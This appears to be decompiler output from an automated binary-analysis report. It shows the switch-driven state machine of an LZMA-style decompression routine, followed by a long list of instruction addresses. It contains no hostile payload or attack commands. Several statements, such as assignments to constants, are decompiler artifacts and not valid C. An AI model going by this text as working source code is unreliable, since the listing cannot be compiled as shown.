						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                      0x00000000
                      0x0040604c
                      0x0040604c
                      0x00406051
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x004066b8
                      0x004066b8
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x0040672e
                      0x0040672e
                      0x00406734
                      0x00406734
                      0x00000000
                      0x00406709
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x00000000
                      0x004068bc
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x00000000
                      0x0040672b
                      0x00406053
                      0x00406053
                      0x00406057
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x0040628f
                      0x0040628f
                      0x00406292
                      0x00406295
                      0x00406298
                      0x0040629b
                      0x0040629e
                      0x004062a1
                      0x004062a4
                      0x004062a7
                      0x004062ad
                      0x004062c5
                      0x004062c8
                      0x004062cb
                      0x004062ce
                      0x004062ce
                      0x004062d1
                      0x004062d7
                      0x004062af
                      0x004062af
                      0x004062b7
                      0x004062bc
                      0x004062be
                      0x004062c0
                      0x004062c0
                      0x004062e1
                      0x004062e4
                      0x00406287
                      0x0040628d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004062e6
                      0x00406262
                      0x00406266
                      0x0040686e
                      0x00000000
                      0x0040686e
                      0x0040626c
                      0x0040626f
                      0x00406272
                      0x00406276
                      0x00406279
                      0x0040627f
                      0x00406281
                      0x00406281
                      0x00406284
                      0x00000000
                      0x00406284
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00406122
                      0x00406122
                      0x00406126
                      0x00406129
                      0x0040612c
                      0x0040612f
                      0x00406132
                      0x00406133
                      0x00406136
                      0x00406138
                      0x0040613e
                      0x00406141
                      0x00406144
                      0x00406147
                      0x0040614a
                      0x00406150
                      0x0040616c
                      0x0040616f
                      0x00406172
                      0x00406175
                      0x0040617c
                      0x00406182
                      0x00406186
                      0x00406152
                      0x00406152
                      0x00406156
                      0x0040615e
                      0x00406163
                      0x00406165
                      0x00406167
                      0x00406167
                      0x00406190
                      0x00406193
                      0x0040610a
                      0x0040610a
                      0x00406110
                      0x004061c3
                      0x004061c9
                      0x00000000
                      0x00000000
                      0x004061cb
                      0x004061ce
                      0x004061d1
                      0x004061d4
                      0x004061d7
                      0x004061da
                      0x004061dd
                      0x004061e0
                      0x004061e3
                      0x004061e9
                      0x00406201
                      0x00406204
                      0x00406207
                      0x0040620a
                      0x0040620a
                      0x0040620d
                      0x00406213
                      0x004061eb
                      0x004061eb
                      0x004061f3
                      0x004061f8
                      0x004061fa
                      0x004061fc
                      0x004061fc
                      0x0040621d
                      0x00406220
                      0x0040619e
                      0x004061a2
                      0x00406862
                      0x00000000
                      0x00406862
                      0x004061a8
                      0x004061ab
                      0x004061ae
                      0x004061b2
                      0x004061b5
                      0x004061bb
                      0x004061bd
                      0x004061bd
                      0x004061c0
                      0x004061c0
                      0x00406220
                      0x00406227
                      0x00406227
                      0x00406227
                      0x0040622b
                      0x0040622b
                      0x0040622e
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x004063f7
                      0x004063f7
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040611c
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406199
                      0x004060e5
                      0x004060e9
                      0x00406856
                      0x004068d2
                      0x004068da
                      0x004068e1
                      0x004068e3
                      0x004068ea
                      0x004068ee
                      0x004068ee
                      0x004060ef
                      0x004060f2
                      0x004060f5
                      0x004060f9
                      0x004060fc
                      0x00406102
                      0x00406104
                      0x00406104
                      0x00406107
                      0x00000000
                      0x00406107
                      0x00406193
                      0x0040609c
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
                      0x0040643e
                      0x00406441
                      0x00406436
                      0x00406436
                      0x00406436
                      0x00406444
                      0x00406447
                      0x0040644a
                      0x0040644a
                      0x0040644d
                      0x00406450
                      0x00406453
                      0x00406453
                      0x00406456
                      0x0040645d
                      0x00406462
                      0x00000000
                      0x00000000
                      0x004064f0
                      0x004064f0
                      0x004064f4
                      0x00406892
                      0x00000000
                      0x00406892
                      0x004064fa
                      0x004064fd
                      0x00406500
                      0x00406504
                      0x00406507
                      0x0040650d
                      0x0040650f
                      0x0040650f
                      0x0040650f
                      0x00406512
                      0x00406515
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
